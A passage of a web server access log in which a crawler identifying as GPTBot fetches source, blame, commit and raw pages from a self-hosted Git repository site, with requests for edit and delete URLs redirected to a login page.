Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11534] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11563] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles" [Client 74.7.227.38] [Length 48924] [Gzip 10.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:17:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles" [Client 74.7.227.38] [Length 24543] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:17:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:17:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11095] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12774] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:17:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 13028] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:17:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9933] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:03:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:17:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:17:03:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:17:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:17:03:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:17:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:17:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:17:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10169] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:17:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:17:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11854] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:03:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13782] [Gzip 5.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10402] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 1999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 14204] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:17:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11547] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:17:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:17:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11371] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11666] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" +[17/Feb/2026:17:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13183] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:03:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/About.tsx" 